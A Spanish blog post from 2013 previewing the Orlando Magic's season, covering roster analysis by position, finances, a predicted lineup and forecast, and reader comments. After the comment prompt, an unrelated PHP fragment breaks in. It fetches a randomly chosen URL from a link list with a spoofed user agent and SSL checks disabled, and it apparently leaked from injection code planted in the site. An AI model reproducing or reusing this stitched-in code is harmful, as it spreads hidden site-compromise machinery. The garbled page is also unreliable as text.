Orlando Magic: Orlandipo Time

29 de September de 2013 por Love Denise

El año 1 post Howard no fue tan malo como se esperaba para la franquicia de Florida. Aunque cosecharon un 20-62 que les situó en el farolillo rojo de la tabla, la temporada sirvió para que los jóvenes creciesen y encontrasen su hueco en la liga.

En los despachos, el nuevo GM, Rob Hennigan, se desmarcó de la política de excesos de su predecesor e impuso un modelo austero encaminado a reducir el gasto salarial y a la captación de un puñado de jugadores jóvenes, trabajadores y sin problemas extradeportivos.

Durante este verano, los Magic aún no estaban en condiciones financieras para pujar por grandes agentes libres. Salarialmente continúan hipotecados fruto de los errores del pasado y  aún deben pagar unos 40 millones a jugadores que no están en la plantilla como Gilbert Arenas, Quentin Richardson, Al Harrington (cortado este verano) o Hedo Turkoglu, con el que en estos momentos se está trabajando en un acuerdo de buy-out.

Ante tan poca flexibilidad financiera, los Magic  han hecho simplemente dos fichajes low-cost, Ronnie Price y Jason Maxiell, aunque la cara nueva más importante para este año será la de Victor Oladipo. El ex de los Hoosiers fue elegido en el nº2 del Draft después de enamorar a Hennigan durante los workouts previos gracias a su ética de trabajo y su intensidad defensiva.

Por tanto, el objetivo del conjunto entrenado por Jacque Vaughn vuelve a ser el mismo del año pasado. Otro año de transición que sirva para el progreso de los más jovenes y la consagración de alguno de ellos como futuras estrellas de la liga. Mirando la plantilla, no se les puede exigir que entren en Playoffs aunque sí deberían conseguir un puñado de victorias más que en la anterior campaña. Para ello, Jacque Vaughn cuenta con un núcleo de jugadores muy físicos, versátiles y polivalentes, lo que nos hace pensar que los Magic serán un equipo ordenado y muy rocoso defensivamente aunque con  bastantes carencias ofensivas en estático como consecuencia de la falta de un jugador franquicia de nivel All-Star. 

Analizamos más profundamente la plantilla que manejará Vaughn durante este año.

Bases: Este puesto ha sido el que más quebraderos de cabeza ha dado a Orlando en los últimos años. El gran capitán Nelson necesita un relevo de garantías. Los Magic intentaron este verano el fichaje de Eric Bledsoe pero finalmente no cuajó. Beno Udrih no convenció y no se le ofreció la renovación y ante el paso del tiempo y la imposibilidad de encontrar un base bueno, bonito y barato, los Magic decidieron probar a Oladipo de playmaker durante la Summer League de Orlando. El resultado fue más positivo de lo esperado. A pesar de no haber jugado nunca de PG, Victor Oladipo promedió 19 puntos y 5 asistencias y, en teoría, parte como primera opción para el puesto de base aunque también jugará en su posición natural de escolta. Aún debe mejorar su ratio de pérdidas de balón y sus porcentajes de tiro pero en Orlando no hay dudas de que “Vic O” se convertirá en una de las sensaciones de la liga en su año rookie.

En segundo plano, aunque todavía con un importantísimo rol tanto en la pista como en el vestuario, estará Jameer Nelson, corazón y alma de los Magic. Tras firmar una notable última campaña, el capitán podría estar ante su última temporada en la franquicia ya que el año que viene los Magic poseen sobre él una Team Option de 8 millones difícilmente ejecutable. Su rol y su cantidad de minutos en pista se verá condicionado por la capacidad de Oladipo para adaptarse a la posición de base.

Para disputar las migajas que dejen los dos jugadores anteriores, los Magic cuentan con E’twaun Moore, que también puede jugar de SG y que se ganó la renovación este verano tras firmar el año pasado unos decentes 7’8 puntos y 2,7 asistencias, y Ronnie Price, firmado este verano por el mínimo y que a priori cuenta con escasas opciones de jugar minutos importantes.

Escoltas: Al margen de que Oladipo vaya a jugar minutos de 2, el puesto de escolta titular debería ser para Arron Afflalo. Gran profesional y un seguro de vida, cumplidor tanto en ataque como en defensa, su nombre ha aparecido en todo tipo de rumores para acabar siendo traspasado pero a día de hoy continúa a las órdenes de Vaughn dispuesto a aportar la veteranía siempre necesaria en equipos tan jóvenes.

En la recámara, los Magic tienen a Doron Lamb aunque salvo explosión su rol será el de jugar minutos de la basura y suplir a los compañeros cuando éstos estén lesionados.

Aleros: Tras la más que probable marcha de Turkolglu y la salida de Dequan Jones, esta es, a priori,  la posición con menos profundidad del equipo. El small-forward queda en manos de Moe Harkless quien realizó una excepcional temporada rookie, firmando 8’2 puntos y 4,5 rebotes,  bailando siempre con la más fea en defensa y yendo claramente de menos a más conforme avanzaban los partidos. Aún debe mejorar su mediocre tiro exterior y su capacidad para driblar y crearse su propio tiro pero a sus 20 años estamos ante uno de los mejores defensores de la próxima década.

Debido al exceso de power-forwards en el equipo, Tobias Harris jugará bastantes minutos en esta posición alternándola con la de ala-pívot. Llegado desde Milwaukee horas antes del último trade deadline, Tobias pasó de apenas entrar en la rotación de los Bucks a convertirse en el jugador franquicia de los Magic, promediando más de 17 puntos y 8 rebotes con los de Florida. Una auténtica bestia, Harris suple por potencia y poderío físico sus carencias y debilidades: en el 4 su baja estatura, y en el 3, la poca amenaza de su tiro exterior. Este año debe servir para consagrarse como un jugador a tener en cuenta en los próximos años.

Ala-pívots: En la posición de 4 Orlando presenta overbooking haciendo complicado adivinar el rol de los jugadores involucrados. Al margen de Harris, el jugador con más calidad y por tanto el 4 titular debería ser Glen Davis pero su rol es toda una incógnita, ya que su contrato y la necesidad de hacerle hueco a los jóvenes para no frenar su progresión, le han colgado durante todo el verano el cartel de transferible. Además, aún no está recuperado de la fractura en el pie que le hizo perderse media temporada y no va a llegar en forma a los primeros partidos de la temporada.

Por detrás de él se encuentra Andrew Nicholson. El canadiense fue de más a menos en su año rookie y acabó la temporada en el banco sin apenas contar para Vaughn. De no espabilar, no sería extraño que en febrero acabase traspasado en un pack junto a algún veterano del equipo. Para completar el puesto de 4 y aportar dureza, intensidad defensiva y veteranía, los Magic ficharon a Jason Maxiell a razón de 5 millones en 2 años, el segundo de ellos no garantizado. Por último, no hay que olvidar a Romero Osby, elegido en el puesto 51 del último Draft. El ex de Oklahoma State hará el training camp con los Magic aunque aún no ha firmado su contrato y su futuro en el equipo dependerá de su rendimiento en los partidos de pretemporada.

Pivots: Llegado en el traspaso de Howard y tratado como objeto de mofa a principios de temporada, Nikola Vucevic firmó una colosal temporada, marcándose 13 puntos y 12 rebotes de promedio, 46 dobles-dobles y estableciendo el récord de la franquicia en rebotes atrapados en un partido (29). Con 22 años y mucho margen de mejora aún, el balcánico está ante el año en el que debe consagrarse como uno de los mejores centers para el próximo lustro y de paso firmar su primer contrato millonario.

Para darle minutos de descanso, se encuentra Kyle O’Quinn, un pívot de baja estatura pero rocoso y de gran envergadura física a la que hay que sumarle su intensidad defensiva.

Altas: Victor Oladipo, Jason Maxiell, Ronnie Price
Bajas: Beno Udrih, Dequan Jones, Al Harrington.

Quinteto Titular: Bastante difícil de predecir debido a la polivalencia y versatilidad de la plantilla pero apostamos por un: Victor Oladipo, Arron Afflalo, Moe Harkless, Glen Davis  y Nikola Vucevic
Sexto hombre: Jameer Nelson / Tobias Harris

Pronóstico: 11º del Este (33-49)

Comenta

8 comentarios a esta entrada

  1. Denise dice:
    #1

    Bueno, actualizo el artículo informando que los Magic firmaron ayer a Romero Osby, aunque se desconocen los términos. Podría tratarse de un contrato que no se convierte en garantizado hasta después del 7 de enero (como el que tiene Kyle O’Quinn), pero salvo sorpresas, ambos entrarán en el Roster final de la plantilla.
    Sobre Turkoglu, ya le han comunicado que ni se le ocurra presentarse al Training Camp que comienza este martes, por tanto, el turco queda apartado del equipo hasta que se llegue con él a un acuerdo de buy-out.

      Citar

  2. Ruxixón dice:
    #2

    Sobre Oladipo se comenta que puede ser una versión un poco peor de Westbrook,el referente es bueno desde luego,y total el margen de probeturas es máximo así que no veo el lado negativo,si sale mal habiendo trascurrido 1-2 meses de competición siempre puedes colocarlo en su posición original que seguro que hará carrera en la NBA.Además es tiempo suficiente para que Affalo haya ganado cartel a un probable traspaso.

    Coincido con el análisis,se moverán en esa horquilla de 10º-12º.Me gusta el equipo y la forma de hacer las cosas,como vieron el talento oculto que recibieron de los Vucevic,Harris(uno de mis preferidos,a ver en la hoops si lo pillo)…espero que el futuro les tenga grandes cosas preparadas.

      Citar

  3. Denise dice:
    #3

    Ruxixón:
    Sobre Oladipo se comenta que puede ser una versión un poco peor de Westbrook,el referente es bueno desde luego,y total el margen de probeturas es máximo así que no veo el lado negativo,si sale mal habiendo trascurrido 1-2 meses de competición siempre puedes colocarlo en su posición original que seguro que hará carrera en la NBA.Además es tiempo suficiente para que Affalo haya ganado cartel a un probable traspaso.

    Coincido con el análisis,se moverán en esa horquilla de 10º-12º.Me gusta el equipo y la forma de hacer las cosas,como vieron el talento oculto que recibieron de los Vucevic,Harris(uno de mis preferidos,a ver en la hoops si lo pillo)…espero que el futuro les tenga grandes cosas preparadas.

    Sobre Oladipo, los analistas comentan que en el peor de los casos Oladipo será una especie de Tony Allen, y en el mejor un Wade, aunque creo que compararlo con el de Miami son palabras mayores.
    Si los Magic jugasen a piñón la temporada, no descartaría que luchasen por pillar la última plaza de Playoffs, pero al final les he dado el 11º porque en febrero probablemente saldrán jugadores importantes ya que la intención del GM es traspasar antes del Deadline a Afflalo, Davis ó Nelson a algun equipo contender al anillo que, ó ha sufrido alguna lesión ó bien ve que está un peldaño por debajo de otros candidatos y quiere reforzarse, a cambio de jugadores jóvenes, y primeras rondas (picks 20-30).
    Tampoco viene mal a partir de febrero un poquito de tanking y tener opciones a Wiggins, Jabari, Randle, Smart ó Exum.

      Citar

  4. rumbero dice:
    #4

    Pues hay ganas de ver a Orlandipo. Yo la verdad no lo acabo de ver de PG excepto en ocasiones puntuales, y eso que hizo una SL más que buena, pero es que es una posición muy comprometida aunque Orlando este en construcción y pueda permitirse 1000 probaturas. Por habilidades su posición es la de 2 aunque Vaughn igual me acaba cerrando la boquita. Y luego andan por ahí Harkless y Harris que tienen muy buena pinta. Es que si a este último le da por seguir con el nível con el q

      Citar

  5. rumbero dice:
    #5

    (sigo que el tabulador + enter me ha jugado una mala pasada)
    …que mostró al final de la temporada pasada es un pedazo de jugador. Creo que los PO les van a quedar un poco lejos aunque se pusieran, pero la base es joven y buena y se van a quitar (por fin) de encima al turco.

      Citar

  6. Denise dice:
    #6

    rumbero:
    Pues hay ganas de ver a Orlandipo. Yo la verdad no lo acabo de ver de PG excepto en ocasiones puntuales, y eso que hizo una SL más que buena, pero es que es una posición muy comprometida aunque Orlando este en construcción y pueda permitirse 1000 probaturas.

    Supongo que es un despiste, es Oladipo…; Orlandipo es el juego de palabras con el que se ha bautizado a este equipo tras draftear al rookie…:)

      Citar

  7. rumbero dice:
    #7

    No no fue a sabiendas, me hizo el gracia el nombre y como aquí somos mucho de poner motes…. 🙂

      Citar

  8. Denise dice:
    #8

    Bfff…como está OIadipo, 18-8-3 en 30 minutos ayer contra los Cavs. jugando exclusivamente de base, posición en la que nunca había jugado antes de verano. En su debe, las perdidas de balón, pero en 2 partidos ya se ha hecho dueño y señor del equipo.
    Y fantastico tambien Bennet, que se marcó 14 puntazos en los últmos 5 minutos hacer ganar a su equipo.

    Pues al final este Draft parece que no va a ser tan malo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>